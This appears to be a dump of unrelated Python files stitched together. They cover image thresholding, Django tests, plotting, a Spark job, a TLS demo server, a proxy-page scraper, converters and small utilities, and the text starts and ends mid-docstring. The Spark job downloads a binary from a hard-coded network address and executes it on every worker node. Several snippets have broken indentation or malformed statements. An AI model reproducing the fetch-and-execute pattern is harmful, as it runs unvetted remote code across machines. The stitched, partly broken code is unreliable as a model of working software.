    meanimg[i,j] = img[i-size//2:i+size//2+1,j-size//2:j+size//2+1].mean()

    i.e., meanimg[i,j] is the mean of the square centred around (i,j).
    Handles 2-D and 3-D images; raises ValueError otherwise.
    '''
    if len(img.shape) == 2:
        mask = numpy.ones((size, size)) / size / size
    elif len(img.shape) == 3:
        mask = numpy.ones((size, size, size)) / size / size / size
    else:
        # Modernised from the Python-2-only `raise ValueError, msg` form
        # (the call form works on both Python 2 and 3).
        raise ValueError('mean_filter: img is of wrong shape (can only handle 2d & 3d)')
    return ndimage.convolve(img, mask)
def localthresholding(img, method='mean', size=8):
    '''
    thresholded = localthresholding(img,method='mean',size=8)

    @param method: One of
        'mean': compute the mean pixel value
        'median': compute the median pixel value
    @param size size of the window to use
    @raises ValueError for an unknown method
    '''
    if method == 'mean':
        func = mean_filter
    elif method == 'median':
        func = ndimage.median_filter
    else:
        # BUG FIX: previously raised the undefined name `ArgumentErrorType`
        # (itself a NameError) with Python-2-only raise syntax.
        raise ValueError("localthresholding: unknown method '%s'" % method)
    return img > func(img, size)
def localglobal(img, ignore_zeros=True, globalmethod='otsu', localmethod='mean', localsize=8):
    '''
    Perform both local and global thresholding.

    result[i,j] = (img[i,j] > global_threshold) * (img[i,j] > local_threshold[i,j])

    @param img: The image
    @param ignore_zeros: Whether to ignore zero-valued pixels
    @param globalmethod: Global method to use ('otsu', 'rc', or 'murphy_rc')
    @param localmethod: Which local method to use (@see localthresholding)
    @param localsize: Size parameter for local thresholding (@see localthresholding)
    @raises ValueError for an unknown globalmethod
    '''
    localobjects = localthresholding(img, method=localmethod, size=localsize)
    if globalmethod == 'otsu':
        T = otsu(img, ignore_zeros=ignore_zeros)
    elif globalmethod == 'rc':
        T = rc(img, ignore_zeros=ignore_zeros)
    elif globalmethod == 'murphy_rc':
        T = murphy_rc(img, ignore_zeros=ignore_zeros)
    else:
        # Modernised from the Python-2-only `raise ValueError, msg` form.
        raise ValueError("localglobal: globalmethod '%s' not recognised." % globalmethod)
    globalobjects = img > T
    # A pixel is foreground only when it passes both thresholds.
    return localobjects * globalobjects
def multithreshold(img, ignore_zeros=True, firstThreshold=20, nrThresholds=5):
    '''
    labeled,N = multithreshold(img, ignore_zeros = True)

    Performs multi thresholding (which is a form of oversegmentation).

    labeled is of the same size and type as img and contains different labels for
    the N detected objects (the return of this function is similar to that of scipy.ndimage.label())

    @param img: The input image
    @param ignore_zeros: Don't take zero pixels into account
    @param firstThreshold: Offset above the image minimum for the lowest threshold
    @param nrThresholds: Number of evenly spaced thresholds to apply
    '''
    output = numpy.zeros_like(img)
    if ignore_zeros:
        pmin = nonzeromin(img)
    else:
        pmin = img.min()
    thresholds = pmin + firstThreshold + (img.max() - pmin - firstThreshold) // nrThresholds * numpy.arange(nrThresholds)
    # Smooth each binary threshold image before labelling.
    Ts = [majority_filter(img > T) for T in thresholds]
    obj_count = 0
    # Append an empty sentinel level so the final labelling is processed
    # by the loop below.
    Ts.append(Ts[0] * 0)
    labeled0, N0 = ndimage.label(Ts[0])
    for T1 in Ts[1:]:
        labeled1, N1 = ndimage.label(T1)
        # PORTED: xrange -> range (Python-2-only builtin; semantics unchanged).
        for obj in range(N0):
            binimg = (labeled0 == (obj + 1))
            objects1 = (labeled1 * binimg)
            # Keep an object when it vanishes or stays a single connected
            # component at the next (higher) threshold level.
            if not objects1.any() or ndimage.label(objects1)[1] == 1:
                obj_count += 1
                output[binimg] = obj_count
        labeled0 = labeled1
        N0 = N1
    return output, obj_count
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
|
import os

# Compare expected outputs (saidas/tNNNN) against produced outputs
# (minhas_saidas/rNNNN), writing each diff to diff/diffNNNN.
for i in range(0, 5000):
    idx = str(i).zfill(4)  # hoisted: previously recomputed four times per iteration
    print(idx)
    os.system("diff saidas/t" + idx + " minhas_saidas/r" + idx + " > diff/diff" + idx)

# Remove empty diff files, leaving only the cases that actually differ.
# NOTE(review): assumed to run once after the loop -- the original file's
# indentation was ambiguous; running it inside the loop is equivalent but
# slower, so this placement is the sensible one.
os.system("find ./diff -empty -delete")
|
#!/usr/bin/python2
# Command-line dict.cc lookup: <script> <from_lang> <to_lang> <word>
import sys
from dictcc import Dict
from dictcc import Result

# Exactly three user arguments are required (argv[0] is the script name).
if len(sys.argv) != 4:
    print("Argument count is wrong")
    sys.exit()

from_lang = sys.argv[1]
to_lang = sys.argv[2]
search = sys.argv[3]

r = Dict.translate(word=search, from_language=from_lang, to_language=to_lang)
# No early exit here: with zero results the loop below simply prints nothing.
if r.n_results < 1:
    print("No match found")

# Python 2: `print (expr).encode('utf-8')` is the print STATEMENT applied
# to the encoded bytes. The "en:"/"de:" labels assume an en<->de lookup.
for tin, tout in r.translation_tuples:
    print(("en: " + tin)).encode('utf-8')
    print(("de: " + tout)).encode('utf-8')
|
from Helpers.misc import swap, verify
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Algoritmo de resolucion de tablero domino haciendo uso de la fuerza bruta
#
# @param pBoard = Matriz sobre el cual se ejecutara el algoritmo para la busqueda de
# soluciones
# @param pTiles = Lista de fichas que sera utilizada para verificaciones
# @param pSolution = Posible solucion a verificar
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def brute_force(pBoard, pTiles, pSolution):
    """Brute-force verification of a candidate domino-board solution.

    pBoard: matrix scanned for the next unassigned (int) cell; visited
        cells are marked in place by converting them to str.
    pTiles: remaining tiles; matched tiles are removed in place.
    pSolution: list of orientation steps (0 = horizontal, 1 = vertical).

    Returns True when the solution places every tile, False otherwise.
    Note: mutates both pBoard and pTiles.
    (Comments translated from the original Spanish.)
    """
    # Holds the two pips of the tile currently being read.
    tile_holder = []
    # No tiles and no steps left: everything was assigned -> valid.
    # Tiles left but no steps left: the candidate solution is invalid.
    if pTiles == [] and pSolution == []:
        return True
    elif(pTiles!=[] and pSolution == []):
        return False
    else:
        # Scan the board left-to-right, top-to-bottom.
        for i in range(len(pBoard)):
            for j in range(len(pBoard[i])):
                # An int cell has not been read yet (read cells are strings).
                if(isinstance(pBoard[i][j], int)):
                    # Step 0: read a tile horizontally (cell + right neighbour).
                    if(pSolution[0] == 0):
                        try:
                            tile_holder.append(pBoard[i][j])
                            tile_holder.append(pBoard[i][j+1])
                            # Mark both cells as read by stringifying them.
                            pBoard[i][j] = str(pBoard[i][j])
                            pBoard[i][j+1] = str(pBoard[i][j+1])
                        # Running off the board means the solution is invalid.
                        except IndexError:
                            return False
                    # Step 1: read a tile vertically (cell + cell below).
                    elif(pSolution[0] == 1):
                        try:
                            tile_holder.append(pBoard[i][j])
                            tile_holder.append(pBoard[i+1][j])
                            # Mark both cells as read by stringifying them.
                            pBoard[i][j] = str(pBoard[i][j])
                            pBoard[i+1][j] = str(pBoard[i+1][j])
                        except IndexError:
                            return False
                    # The tile just read must still be available in pTiles.
                    if(verify(tile_holder, pTiles)):
                        # Remove it; if the stored orientation differs, flip
                        # the tile with swap() and remove the flipped form.
                        # BUG FIX: bare `except:` narrowed to ValueError,
                        # the only exception list.remove raises.
                        try:
                            pTiles.remove(tile_holder)
                        except ValueError:
                            swap(tile_holder)
                            pTiles.remove(tile_holder)
                        # Recurse on the remaining steps of the solution.
                        return brute_force(pBoard, pTiles, pSolution[1:])
                    # Tile unavailable (already placed) -> invalid solution.
                    else:
                        return False
def func(number):
    """Spell out an integer 0-999 in English.

    Returns a tuple (str(number), english_text). The parameter was
    previously named `int`, shadowing the builtin; positional callers are
    unaffected by the rename.

    NOTE(review): teens come out as "ten <unit>" (e.g. 15 -> "ten five"),
    and 100 yields a dangling "hundred and" -- quirks preserved on purpose.
    """
    factor1 = str(number)
    # Tens words keyed by digit character ('0' maps to the empty string).
    ten = {
        "1": "ten",
        "2": "twenty",
        "3": "thirty",
        "4": "forty",
        "5": "fifty",
        "6": "sixty",
        "7": "seventy",
        "8": "eighty",
        "9": "ninety",
        "0": ""
    }
    # Units (and hundreds) words keyed by digit character.
    hundred = {
        "1": "one",
        "2": "two",
        "3": "three",
        "4": "four",
        "5": "five",
        "6": "six",
        "7": "seven",
        "8": "eight",
        "9": "nine",
        "0": ""
    }
    # Reverse so index 0 is the least-significant digit.
    factor = factor1[::-1]
    if len(factor) == 3:
        english_text = "{} {} {}".format(hundred[factor[2]] + " hundred and", ten[factor[1]], hundred[factor[0]])
    elif len(factor) == 2:
        english_text = "{} {}".format(ten[factor[1]], hundred[factor[0]])
    else:
        english_text = "{}".format(hundred[factor[0]])
    return factor1, english_text
if __name__ == '__main__':
    # Python 2 entry point: raw_input returns a string, which func()
    # converts with str() before processing; `print` is the statement form.
    a = raw_input("enter the value")
    print func(a)
from django.utils import timezone
from consents.models import Consent, Person, Term
from consents.tests.base import ConsentTestBase
class TestTermModel(ConsentTestBase):
    """Tests that unset ``Consent`` rows are auto-created for every person
    whenever a ``Term`` is created (and for every new person), and that
    plain updates to a term or person do not create or mutate consents.
    """

    def setUp(self) -> None:
        super().setUp()
        self.person1 = Person.objects.create(
            personal="Harry", family="Potter", email="hp@magic.uk"
        )
        self.person2 = Person.objects.create(
            personal="Ron",
            family="Weasley",
            email="rw@magic.uk",
            username="rw",
        )

    def _assert_unset_consents(self, term, people, archived_at=None):
        """Assert *term* has exactly one unset consent per person in *people*.

        Every consent must have no ``term_option``; ``archived_at`` is
        compared against the given value (``None`` means not archived).
        """
        consents = Consent.objects.filter(term=term)
        self.assertEqual(len(consents), len(people))
        for person in people:
            consent = consents.filter(person=person)[0]
            self.assertIsNone(consent.term_option)
            if archived_at is None:
                self.assertIsNone(consent.archived_at)
            else:
                self.assertEqual(consent.archived_at, archived_at)

    def test_unset_consents_are_created_on_term_create(self) -> None:
        term1 = Term.objects.create(
            content="term1",
            slug="term1",
        )
        self._assert_unset_consents(term1, [self.person1, self.person2])
        # Updating the term must not create or change consents.
        term1.content = "New content"
        term1.save()
        self._assert_unset_consents(term1, [self.person1, self.person2])

    def test_unset_consents_are_created_on_person_create(self) -> None:
        term1 = Term.objects.create(
            content="term1",
            slug="term1",
        )
        person3 = Person.objects.create(
            personal="Hermione",
            family="Granger",
            email="hg@magic.uk",
            username="hg",
        )
        people = [self.person1, self.person2, person3]
        self._assert_unset_consents(term1, people)
        # Updating a person must not create or change consents.
        person3.middle = "middle"
        person3.save()
        self._assert_unset_consents(term1, people)

    def test_unset_consents_are_created_on_person_create_archived_term(self) -> None:
        term1 = Term.objects.create(
            content="term1", slug="term1", archived_at=timezone.now()
        )
        person3 = Person.objects.create(
            personal="Hermione",
            family="Granger",
            email="hg@magic.uk",
            username="hg",
        )
        people = [self.person1, self.person2, person3]
        # Consents created against an archived term are archived immediately.
        self._assert_unset_consents(term1, people, archived_at=term1.archived_at)
        # Updating a person must not create or change consents.
        person3.middle = "middle"
        person3.save()
        self._assert_unset_consents(term1, people, archived_at=term1.archived_at)
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy.stats import spearmanr, pearsonr
# Load the post-processing result tables (H12 vs H15 jejunum samples);
# the row index is the second-to-last column of each tab-separated file.
data_after = pd.read_csv('../../data/for_plotting_project/post_processing_YES_filtering_of_3_protein_for_scatterplot_density_12_vs_15.txt', sep="\t", index_col = -2)
data_before = pd.read_csv('../../data/for_plotting_project/post_processing_no_filtering_of_protein_for_scatterplot_density_12_vs_15.txt', sep="\t", index_col = -2)
def scatter(dataframe, ax, title):
    """Draw a density-coloured scatter of H12 vs H15 jejunum concentrations.

    Annotates the panel with Pearson/Spearman correlation coefficients and
    returns the PathCollection so a shared colorbar can be built from it.
    """
    jej = dataframe.loc[:, ['Jejunum concentration (pmol/mg) H12',
                            'Jejunum concentration (pmol/mg) H15']]
    j7 = jej.loc[:, 'Jejunum concentration (pmol/mg) H12']
    j13 = jej.loc[:, 'Jejunum concentration (pmol/mg) H15']
    r = round(pearsonr(j7, j13)[0], 4)
    s = round(spearmanr(j7, j13)[0], 4)
    # Point colour encodes the precomputed local point density column.
    z = np.asarray(dataframe.loc[:, 'N: Density_Jejunum concentration (pmol/mg) H15_Jejunum concentration (pmol/mg) H12'])
    # BUG FIX: edgecolor='' is rejected by modern matplotlib; 'none' is the
    # documented value for markers without edges.
    cax = ax.scatter(j7, j13, c=z, s=20, edgecolor='none', cmap=plt.cm.gnuplot2)
    ax.text(-10, 11, 'Pearson R = {0}\nSpearman R = {1}'.format(r, s), fontsize=9)
    ax.set_title(title)
    return cax
'''
if after != 'yes':
#ax.set_title('Correlation before filtering')
plt.savefig('before.png', format = 'png', dpi = 700)
else:
#ax.set_title('Correlation after filtering')
plt.savefig('after.png', format = 'png', dpi = 700)
'''
fig, (ax1, ax2) = plt.subplots(1, 2, sharey = True, sharex = True, figsize = (10,5))
cax = scatter(data_before, ax1, 'Before filtering')
scatter(data_after, ax2, 'After filtering')
#fig.colorbar(cax)
ax = fig.add_subplot(111, frameon=False) #to override the 'frequency on all, just make a big frequency ax '
plt.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
ax.set_xlabel('$log_{10}$ Concentration sample H7(pmol/mg)', labelpad=10) # Use argument `labelpad` to move label downwards.
ax.set_ylabel('$log_{10}$ Concentration sample H13(pmol/mg)', labelpad= 10)
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.85, 0.15, 0.05, 0.7])
fig.colorbar(cax, cax=cbar_ax)
#plt.tight_layout()
plt.savefig('scatterplot.png', dpi = 700)
#finding r2 avg
'''
c = data_before.loc[:,[n for n in data_before.columns if 'once' in n]]
c_after = data_after.loc[:,[n for n in data_after.columns if 'once' in n]]
def rval(concentrations):
r_vals = [ ]
del concentrations['N: Density_Jejunum concentration (pmol/mg) H15_Jejunum concentration (pmol/mg) H12']
del concentrations['N: Excluded fraction_Jejunum concentration (pmol/mg) H15_Jejunum concentration (pmol/mg) H12']
for x in xrange(len(concentrations.columns)):
for y in xrange(len(concentrations.columns)):
r_vals.append(pearsonr(concentrations.iloc[:,x], concentrations.iloc[:,y])[0])
return (r_vals)
rc = rval(c)
rca = rval(c_after)
print np.mean(rc),'<-- before' , 'after -->' , np.mean(rca)
'''
|
"""
CHIME constants and parameters.
"""
# Sampling frequency
ADC_SAMPLE_RATE = float(800e6)
# Number of samples in the inital FFT in the F-engine.
FPGA_NSAMP_FFT = 2048
FPGA_FRAME_RATE = ADC_SAMPLE_RATE / FPGA_NSAMP_FFT
# f-engine parameters for alias sampling.
FPGA_FREQ0 = ADC_SAMPLE_RATE
FPGA_NFREQ = FPGA_NSAMP_FFT / 2
FPGA_DELTA_FREQ = - ADC_SAMPLE_RATE / FPGA_NSAMP_FFT
|
from pyspark import SparkContext, SparkConf
import os
import subprocess
import tempfile
import urllib2
import sys
JOB_NAME = "Test Spark JOB"
SOURCE_PROGRAM_PATH = "http://192.168.205.44:8000/a.out"
TEMP_PATH = "/tmp/a.out"
LOAD_COUNT = 8
SC = None
def initialize_spark(job_name="SparkJob"):
"""
Configure spark object
:param job_name:
:return: Spark object
"""
# Spark Configuration
conf = SparkConf().setAppName(job_name)
return SparkContext(conf=conf)
def download_file(src_file, dest_file):
    """Download *src_file* to *dest_file* and mark it executable.

    :param src_file: path or URL of the file to be downloaded
    :param dest_file: destination path of the downloaded file
    :return: True on success (exceptions propagate on failure)
    """
    import stat

    response = urllib2.urlopen(src_file)
    try:
        with open(dest_file, 'wb') as output:
            output.write(response.read())
    finally:
        # urllib2 responses are not context managers in Python 2.
        response.close()
    # Add the user-execute bit directly instead of shelling out to chmod:
    # os.system with an unquoted path breaks on spaces and is injectable.
    os.chmod(dest_file, os.stat(dest_file).st_mode | stat.S_IXUSR)
    return True
def delete_downloaded_file(file_path):
    """Remove the file at *file_path* when present; no-op otherwise.

    :param file_path: path of a previously downloaded file
    :return: None
    """
    if not os.path.exists(file_path):
        return
    os.remove(file_path)
def run_app(file_path, arguments):
    """Run the test binary, fetching it first if it is missing locally.

    :param file_path: local path of the executable
    :param arguments: extra command-line arguments (list of strings)
    :return: the process's captured stdout
    """
    if not os.path.exists(file_path):
        download_file(SOURCE_PROGRAM_PATH, file_path)
    command = [file_path] + list(arguments)
    # Spool stdout through a temporary file so very large outputs cannot
    # fill (and deadlock on) an OS pipe buffer.
    with tempfile.TemporaryFile() as captured:
        process = subprocess.Popen(command, stdout=captured)
        process.wait()
        captured.seek(0)
        return captured.read()
def run_parallel_job(no_of_load):
    """Fan out *no_of_load* runs of the test binary across the cluster.

    :param no_of_load: number of parallel tasks to launch
    :return: None (the collected outputs are printed)
    """
    sc = initialize_spark(JOB_NAME)
    task_ids = range(1, no_of_load + 1)
    outputs = sc.parallelize(task_ids).map(
        lambda task_id: run_app(TEMP_PATH, [str(task_id)]))
    print("\n\nOutput in a list:\n")
    print(outputs.collect())
    sc.stop()
def clear_downloaded_file(noof_worker_nodes):
    """Remove any previously downloaded binary from the worker nodes.

    :param noof_worker_nodes: number of partitions to spread the delete over
    :return: None
    """
    sc = initialize_spark(JOB_NAME)
    partition_ids = range(1, noof_worker_nodes + 1)
    deletions = sc.parallelize(partition_ids).map(
        lambda _: delete_downloaded_file(TEMP_PATH))
    # Force evaluation: map() alone is lazy.
    deletions.count()
    print("Old files are removed from the nodes.")
    sc.stop()
if __name__ == "__main__":
if len(sys.argv) >= 2:
SOURCE_PROGRAM_PATH = sys.argv[1]
if len(sys.argv) == 3:
LOAD_COUNT = int(sys.argv[2])
clear_downloaded_file(LOAD_COUNT)
run_parallel_job(LOAD_COUNT)
|
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sanic import Blueprint
import os
# Common prefix for all Slack-related routes.
URL_BASE = '/slack'

# Blueprints for the OAuth flow and for incoming Slack events; registered
# by the enclosing application.
slack_auth_endpoints = Blueprint('slack_auth_endpoints')
slack_event_endpoints = Blueprint('slack_event_endpoints')

# Slack app credentials, injected via environment variables
# ("REPLACEME" placeholders when unset).
slack_client_id = os.getenv("CAPE_SLACK_CLIENT_ID", "REPLACEME")
slack_client_secret = os.getenv("CAPE_SLACK_CLIENT_SECRET", "REPLACEME")
slack_verification = os.getenv("CAPE_SLACK_VERIFICATION", "REPLACEME")
slack_app_url = os.getenv("CAPE_SLACK_APP_URL", "REPLACEME")
|
#!/usr/bin/env python3
from grole import Grole
import ssl
# Create an SSL context from keys created through e.g. Let's Encrypt or self signing:
# Generate a self signed cert with:
# openssl genrsa -out rootCA.key 4096
# openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.crt -subj "/CN=root"
# openssl genrsa -out cert.key 2048
# openssl req -new -sha256 -key cert.key -subj "/CN=localhost" -out cert.csr
# openssl x509 -req -in cert.csr -CA rootCA.crt -CAkey rootCA.key -CAcreateserial -out cert.crt -days 500 -sha256
# If using a self signed cert, you can access the server using: curl --cacert rootCA.crt https://localhost:8443
# Server-side TLS context; CLIENT_AUTH means "authenticate myself to clients".
ssl_context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain('cert.crt', keyfile='cert.key')
# Refuse legacy TLS 1.0/1.1 handshakes.
ssl_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
app = Grole()
@app.route('/(.*)?')
def index(env, req):
    # Catch-all route: same response for every path.
    return 'Is it secret? Is it safe?'
# Serve HTTPS on all interfaces; blocks until interrupted.
app.run('0.0.0.0', port=8443, ssl_context=ssl_context)
|
from collections import Counter
# Competitive-programming style stdin solver.
# Reads M x N grid dims, K/L cut counts and D segments; appears to pick the
# K row positions and L column positions that occur most often among the
# segment minima -- TODO confirm against the original problem statement.
M,N,K,L,D = map(int, input().split())
row = []
col = []
for _ in range(D):
    x,y,p,q = map(int, input().split())
    # Same x => the pair differs along y (candidate column cut at min(y, q));
    # same y => differs along x (candidate row cut at min(x, p)).
    if x==p: col.append(min(y,q))
    if y==q: row.append(min(x,p))
# Rank candidate positions by frequency (most_common sorts descending).
c0 = Counter(row).most_common()
c1 = Counter(col).most_common()
k = [x[0] for x in c0]
l = [x[0] for x in c1]
# Emit the top K row positions and top L column positions, each sorted.
print(" ".join(map(str,sorted(k[:K]))))
print(" ".join(map(str,sorted(l[:L]))))
|
import write_dependencies as wd
def parse_document(sentence_dictionary, event_id, acct_type):
    """
    INPUT: dictionary that is output from the Stanford Core Parser using
    jsonrpclib
    OUTPUT: a list of lists where each sublist represents a dependency and
    contains sentence id, both words in the dependency and their part of speech tags
    This returns the values to be stored in the database
    """
    dependency_store_list =[]
    # NOTE: xrange => this module targets Python 2.
    for j in xrange(len(sentence_dictionary)):
        dependency_list = []
        sentence_id = j
        dependencies = sentence_dictionary[j]['dependencies']
        word_info = sentence_dictionary[j]['words']
        # Flatten the parser's per-word records down to just the word strings.
        word_list = []
        for k in xrange(len(word_info)):
            word_list.append(word_info[k][0])
        # Delegate the per-sentence dependency formatting to write_dependencies.
        dependency_list = wd.parse_dependencies(dependencies, event_id, acct_type, sentence_id, word_list)
        dependency_store_list.append(dependency_list)
    return dependency_store_list |
'''
Created on 2013-7-27
@author: Administrator
'''
import urllib,urllib2
from thread_pool import Worker
from thread_pool import WorkerManager
import sys
import framework.tool.FileHandler as FileHandler
def test_job(id, sleep = 0.001 ):
    """Fetch one cnproxy listing page and save it as proxy_{id}.html.

    Returns *id* so the worker pool can report which job completed.
    (Python 2 module: urllib.urlopen and print statements.)
    """
    try:
        html = urllib.urlopen('http://www.cnproxy.com/proxy%d.html' % (id)).read()
        fh = FileHandler.FileHandler("proxy_{%d}.html" % id , "w")
        fh.file_put_contents(html)
        fh.close()
    except:
        # Best-effort: report the failing page id and the exception info.
        print '[%4d]' % id, sys.exc_info()[:2]
    return id
def test():
    """Download listing pages 1-10 through a 3-thread worker pool."""
    import socket
    # Avoid hanging forever on dead proxies.
    socket.setdefaulttimeout(10)
    print 'start testing'
    wm = WorkerManager(3)
    for i in range(1,11):
        wm.add_job( test_job, i, i*0.001 )
    wm.wait_for_complete()
    print 'end testing'

if __name__ == '__main__' :
    test() |
# Read two integers from stdin.
l = int(input())
c = int(input())
# Print 0 when exactly one of the two is even (different parity),
# otherwise 1 (same parity).
if( l % 2 == 0 and c % 2 == 1) or ( l % 2 == 1 and c % 2 == 0) :
    print(0)
else:
    print(1) |
from unittest.case import TestCase
from unittest import main
from case_converter.utils import convert_to_camel_case, convert_to_underscore
class TestConvertToCamelCase(TestCase):
    """Tests for ``convert_to_camel_case`` across dicts, lists, tuples,
    plain strings and nested containers."""

    def test_underscore_to_camel_dict(self):
        input_data = {
            "9_under_score_4_days": 1,
            "a_game_of_thrones": 1
        }
        expected_output = {
            "9UnderScore4Days": 1,
            "aGameOfThrones": 1
        }
        test_output = convert_to_camel_case(input_data)
        self.assertEqual(test_output, expected_output)

    def test_underscore_to_camel_list(self):
        input_data = [
            {
                "9_under_score_4_days": 1,
                "a_game_of_thrones": 1
            }
        ]
        expected_output = [
            {
                "9UnderScore4Days": 1,
                "aGameOfThrones": 1
            }
        ]
        test_output = convert_to_camel_case(input_data)
        self.assertEqual(test_output, expected_output)

    def test_underscore_to_camel_tuple(self):
        # BUG FIX: "( {...} )" is just a parenthesised dict, so this test
        # never exercised tuples; the trailing comma makes a real 1-tuple.
        input_data = (
            {
                "9_under_score_4_days": 1,
                "a_game_of_thrones": 1
            },
        )
        expected_output = (
            {
                "9UnderScore4Days": 1,
                "aGameOfThrones": 1
            },
        )
        test_output = convert_to_camel_case(input_data)
        self.assertEqual(test_output, expected_output)

    def test_underscore_to_camel_str(self):
        # Plain strings pass through unchanged.
        input_data = "A test string"
        test_output = convert_to_camel_case(input_data)
        self.assertEqual(test_output, input_data)

    def test_underscore_to_camel_nested(self):
        input_data = {
            "an_underscore_item": 1,
            "an_underscore_dict": {
                "an_underscore_item": 1,
            },
            "an_underscore_list": [
                {
                    "an_underscore_item": 1,
                },
            ],
            "an_underscore_tuple": (
                {
                    "an_underscore_item": 1,
                },
            )
        }
        expected_output = {
            "anUnderscoreItem": 1,
            "anUnderscoreDict": {
                "anUnderscoreItem": 1,
            },
            "anUnderscoreList": [
                {
                    "anUnderscoreItem": 1,
                },
            ],
            "anUnderscoreTuple": (
                {
                    "anUnderscoreItem": 1,
                },
            )
        }
        test_output = convert_to_camel_case(input_data)
        self.assertEqual(test_output, expected_output)
class TestConvertToUnderscore(TestCase):
    """Tests for ``convert_to_underscore`` across dicts, lists, tuples,
    plain strings and nested containers."""

    def test_camel_to_underscore_dict(self):
        input_data = {
            "9UnderScore4Days": 1,
            "aGameOfThrones": 1
        }
        expected_output = {
            "9_under_score_4_days": 1,
            "a_game_of_thrones": 1
        }
        test_output = convert_to_underscore(input_data)
        self.assertEqual(test_output, expected_output)

    def test_camel_to_underscore_list(self):
        input_data = [
            {
                "9UnderScore4Days": 1,
                "aGameOfThrones": 1
            }
        ]
        expected_output = [
            {
                "9_under_score_4_days": 1,
                "a_game_of_thrones": 1
            }
        ]
        test_output = convert_to_underscore(input_data)
        self.assertEqual(test_output, expected_output)

    def test_camel_to_underscore_tuple(self):
        # BUG FIX: "( {...} )" is just a parenthesised dict, so this test
        # never exercised tuples; the trailing comma makes a real 1-tuple.
        input_data = (
            {
                "9UnderScore4Days": 1,
                "aGameOfThrones": 1
            },
        )
        expected_output = (
            {
                "9_under_score_4_days": 1,
                "a_game_of_thrones": 1
            },
        )
        test_output = convert_to_underscore(input_data)
        self.assertEqual(test_output, expected_output)

    def test_camel_to_underscore_str(self):
        # Plain strings pass through unchanged.
        input_data = "A test string"
        test_output = convert_to_underscore(input_data)
        self.assertEqual(test_output, input_data)

    def test_camel_to_underscore_nested(self):
        input_data = {
            "anUnderscoreItem": 1,
            "anUnderscoreDict": {
                "anUnderscoreItem": 1,
            },
            "anUnderscoreList": [
                {
                    "anUnderscoreItem": 1,
                },
            ],
            "anUnderscoreTuple": (
                {
                    "anUnderscoreItem": 1,
                },
            )
        }
        expected_output = {
            "an_underscore_item": 1,
            "an_underscore_dict": {
                "an_underscore_item": 1,
            },
            "an_underscore_list": [
                {
                    "an_underscore_item": 1,
                },
            ],
            "an_underscore_tuple": (
                {
                    "an_underscore_item": 1,
                },
            )
        }
        test_output = convert_to_underscore(input_data)
        self.assertEqual(test_output, expected_output)
if __name__ == '__main__':
    # Run the test suite via unittest's CLI runner.
    main()
|
import yfinance as yf
import datetime as dt
import pandas as pd
def sixMonthIndex(tickers):
    """Rank *tickers* by 6-month price performance.

    Downloads ~180 days of adjusted closes per ticker, computes the ratio
    of the latest close to the earliest one, prints the full descending
    ranking and returns the best-performing third as a pandas Series.
    """
    end = dt.datetime.today()
    start = end - dt.timedelta(180)
    cl_price = pd.DataFrame()
    for ticker in tickers:
        cl_price[ticker] = yf.download(ticker, start, end, period="6mo")["Adj Close"]
    # Growth factor over the window: last close divided by first close.
    finalList = cl_price.iloc[-1] / cl_price.iloc[0]
    finalList.sort_values(ascending=False, inplace=True)
    print("6 month Index")
    print(finalList)
    # Keep only the top third of the ranking.
    return finalList[:len(finalList) // 3]
|
class Node:
    """A node of a simple (unbalanced) binary search tree.

    Duplicate values are silently ignored on insert, matching the original
    behaviour (neither subtree accepts an equal key).
    """

    def __init__(self, value):
        self.data = value
        self.left = None   # subtree with smaller values
        self.right = None  # subtree with larger values

    def insert(self, current, new):
        """Insert node *new* into the subtree rooted at *current*."""
        if current.data < new.data:
            if current.right is not None:
                self.insert(current.right, new)
            else:
                current.right = new
        elif current.data > new.data:
            if current.left is not None:
                self.insert(current.left, new)
            else:
                current.left = new
        # Equal keys fall through and are ignored.

    def search(self, current, wanted):
        """Search for *wanted* in the subtree rooted at *current*.

        Prints the original "found" message, and now also returns
        True/False (backward compatible: the original returned None,
        which no caller used).
        """
        if current.data == wanted:
            print('There it is!')
            return True
        if current.data < wanted and current.right is not None:
            return self.search(current.right, wanted)
        if current.data > wanted and current.left is not None:
            return self.search(current.left, wanted)
        return False

    def cout(self, current):
        """Print the subtree rooted at *current* in sorted (in-order) order."""
        if current:
            self.cout(current.left)
            print(current.data)
            self.cout(current.right)
input_array = input("Input:\n").split(' ')
root = Node(int(input_array[0]))
for i in range(1, len(input_array)):
new = Node(int(input_array[i]))
root.insert(root, new)
root.cout(root)
wanted = int(input('What do you want to search for?\n'))
root.search(root, wanted) |
from tkinter import *
# NOTE(review): HEIGHT/WIDTH are defined but never used; the window size
# is hard-coded in geometry() below.
HEIGHT = 1000
WIDTH = 1000
from tkinter import ttk

# Main application window with a two-tab notebook.
window = Tk()
window.geometry("800x1000")
window.title("42 Opentrons App")
tab_control = ttk.Notebook(window)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab_control.add(tab1, text='Main')
tab_control.add(tab2, text='Camera')
# Placeholder labels for each tab.
lbl1 = Label(tab1, text= 'label1')
lbl1.grid(column=0, row=0)
lbl2 = Label(tab2, text= 'label2')
lbl2.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
# Blocks until the window is closed.
window.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import dbus
import re
def get_bus():
    """Return a connection to the user's D-Bus session bus."""
    return dbus.SessionBus()
def get_player(bus):
    """Return the first MPRIS2 media player object found on *bus*.

